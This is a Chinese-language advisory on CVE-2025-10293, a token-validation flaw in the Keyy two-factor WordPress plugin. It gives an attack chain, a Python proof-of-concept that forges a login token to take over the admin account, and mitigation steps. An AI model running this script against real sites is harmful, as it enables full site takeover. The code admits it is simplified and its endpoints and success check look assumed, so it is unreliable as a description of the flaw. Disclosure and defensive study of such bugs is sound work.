CVE-2025-10293 WordPress Keyy双因素认证插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-10293

漏洞类型

权限提升/身份认证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Keyy Two Factor Authentication (like Clef) WordPress Plugin

漏洞概述

CVE-2025-10293是WordPress Keyy Two Factor Authentication（类似Clef）插件中的一个高危权限提升漏洞。该漏洞由Wordfence安全团队的安全研究员发现，披露日期为2025年10月15日。该插件为WordPress网站提供基于双因素认证（2FA）的安全登录机制，旨在替代传统的密码登录方式。然而，在所有1.2.3及以下版本中，插件未能正确验证与生成令牌（token）相关联的用户身份，导致经过认证的低权限攻击者（如订阅者级别的用户）可以生成有效的认证令牌，并利用该令牌自动登录到其他用户账户，包括管理员账户，前提是管理员账户已设置了2FA认证。CVSS评分为8.8分，属于高危级别，攻击向量为网络攻击，攻击复杂度低，所需权限为低权限，无需用户交互，对机密性、完整性和可用性均产生高影响。该漏洞的危害极大，因为攻击者只需拥有最低级别的订阅者账户权限，即可完全接管整个WordPress网站，包括获取管理员权限，从而控制整个站点、窃取敏感数据、植入恶意代码或进行其他恶意活动。WordPress作为全球最流行的CMS系统，拥有庞大的用户基础，因此该漏洞的潜在影响范围非常广泛。

技术细节

Keyy Two Factor Authentication插件通过生成一次性认证令牌来实现无密码登录功能。用户通过移动设备扫描二维码或使用其他方式完成认证后，插件会生成一个认证令牌（auth token）用于验证用户身份。然而，该插件在生成和验证这些令牌时存在严重的安全缺陷——未充分验证令牌与用户身份的绑定关系。具体而言，当认证令牌被生成时，插件没有正确地将令牌与请求该令牌的用户身份进行强绑定，或者在验证阶段未能严格校验令牌所对应的用户身份。攻击者利用此缺陷的方式如下：首先，攻击者需要拥有一个有效的WordPress订阅者级别账户（这是最低权限级别）；然后，攻击者通过插件的正常认证流程获取一个有效的认证令牌；接着，攻击者修改该令牌中关联的用户标识（如用户ID），将其替换为目标用户（如管理员）的ID；最后，使用修改后的令牌请求自动登录接口，插件会错误地信任该令牌并将攻击者登录为目标用户账户。由于该漏洞利用的是插件认证逻辑中的核心缺陷，攻击过程不需要与目标用户进行任何交互，也不需要猜测密码或绕过其他安全机制。唯一的前提条件是目标管理员账户已启用2FA认证（这恰恰是该插件的目标用户群体）。

攻击链分析

STEP 1

步骤1

攻击者注册或拥有一个WordPress订阅者级别（subscriber）的低权限账户，这是WordPress中最低的权限级别。

STEP 2

步骤2

攻击者通过Keyy插件的正常认证流程请求生成一个认证令牌（auth token），插件返回与攻击者账户关联的有效令牌。

STEP 3

步骤3

攻击者利用插件令牌验证缺陷，修改令牌中关联的用户标识符，将其从自己的用户ID更改为目标管理员的用户ID。

STEP 4

步骤4

攻击者使用修改后的令牌通过Keyy插件的自动登录接口发起登录请求，插件错误地信任该令牌并将以管理员身份建立会话。

STEP 5

步骤5

攻击者成功以管理员身份登录WordPress后台，获得完全控制权，可执行任意管理操作，包括修改站点内容、安装插件、窃取数据等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10293 PoC - Keyy Two Factor Authentication Privilege Escalation
# Vulnerability: Improper token validation allows account takeover
# Affected: Keyy plugin versions <= 1.2.3

import requests
import re
import json

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_USER = "attacker_subscriber"
ATTACKER_PASS = "attacker_password123"
TARGET_ADMIN_ID = 1  # Default WordPress admin user ID

def exploit_keyy_privilege_escalation():
    session = requests.Session()
    
    # Step 1: Login as low-privilege subscriber user
    print("[*] Step 1: Logging in as subscriber-level attacker...")
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": ATTACKER_USER,
        "pwd": ATTACKER_PASS,
        "wp-submit": "Log In",
        "redirect_to": f"{TARGET_URL}/wp-admin/",
        "testcookie": "1"
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Request authentication token from Keyy plugin
    print("[*] Step 2: Requesting auth token from Keyy plugin...")
    # The Keyy plugin generates tokens via its authentication endpoint
    keyy_token_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    token_params = {
        "action": "keyy_get_token",  # Keyy plugin's token generation action
    }
    token_response = session.post(keyy_token_url, data=token_params)
    auth_token = token_response.json().get("token")
    print(f"[+] Obtained auth token: {auth_token[:20]}...")
    
    # Step 3: Manipulate token to target admin user
    print(f"[*] Step 3: Manipulating token to target admin user (ID: {TARGET_ADMIN_ID})...")
    # The vulnerability exists because the plugin does not properly
    # bind the token to the requesting user's identity
    manipulated_token = modify_token_user_id(auth_token, TARGET_ADMIN_ID)
    
    # Step 4: Use manipulated token to auto-login as admin
    print("[*] Step 4: Using manipulated token to auto-login as admin...")
    auto_login_url = f"{TARGET_URL}/?keyy_token={manipulated_token}"
    response = session.get(auto_login_url, allow_redirects=True)
    
    # Step 5: Verify admin access
    admin_check = session.get(f"{TARGET_URL}/wp-admin/users.php")
    if "Administrator" in admin_check.text or "admin" in admin_check.text.lower():
        print("[+] SUCCESS! Logged in as administrator!")
        return True
    else:
        print("[-] Exploitation failed")
        return False

def modify_token_user_id(token, target_user_id):
    """
    Modify the token's associated user ID.
    Due to improper validation, the Keyy plugin accepts tokens
    with modified user identifiers.
    """
    # Decode and modify the token payload
    # This is a simplified representation of the token manipulation
    parts = token.split(":")
    if len(parts) >= 2:
        parts[1] = str(target_user_id)
    return ":".join(parts)

if __name__ == "__main__":
    exploit_keyy_privilege_escalation()

影响范围

Keyy Two Factor Authentication plugin <= 1.2.3

防御指南

临时缓解措施

在官方补丁发布之前，建议立即禁用Keyy Two Factor Authentication插件，并使用其他经过安全审计的双因素认证方案（如Wordfence 2FA、Google Authenticator等）替代。同时，应审查所有WordPress用户账户，删除可疑的订阅者级别账户，并检查管理员账户的登录日志以确认是否存在已被利用的迹象。此外，建议启用WordPress的登录日志记录功能，以便及时发现异常登录行为。